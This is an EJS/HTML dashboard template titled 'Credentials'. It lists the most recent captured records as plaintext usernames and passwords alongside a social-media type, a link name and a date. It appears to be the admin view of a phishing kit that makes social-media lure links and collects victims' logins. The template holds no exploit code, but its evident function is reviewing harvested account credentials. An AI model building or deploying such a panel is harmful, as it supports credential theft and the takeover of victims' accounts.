<div class="main-panel">
  <div class="content-wrapper">
    <h3 class="text-white">Credentials</h3>

    <div class="table-responsive">
      <table class="table" id="myTable">
        <thead>
          <tr>
            <th class="text-white">Credentials</th>
            <th class="text-white">Social Media</th>
            <th class="text-white">Link Name</th>
            <th class="text-white">Date</th>
          </tr>
        </thead>
        <tbody>
          <% credentials.reverse().slice(0,11).forEach(c => {%>
          <tr>
            <td class="text-white">
              <p class="text-white">
                Username: <b><%= c.fields.username %></b>
              </p>
              <br />
              <p class="text-white">
                Password: <b><%= c.fields.password %></b>
              </p>
            </td>
            <td class="text-white"><%= c.linkType %></td>
            <td class="text-white"><%= c.linkName %></td>
            <td class="text-white">
              <%= moment(c.date).format("MMM Do YY h:mm a") %>
            </td>
          </tr>
          <%})%>
        </tbody>
      </table>
    </div>
  </div>
</div>

<script
  src="https://code.jquery.com/jquery-3.7.1.min.js"
  integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
  crossorigin="anonymous"
></script>
<script src="https://cdn.datatables.net/1.13.8/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.13.8/js/dataTables.bootstrap4.min.js"></script>

<script>
  new DataTable("#myTable");
</script>
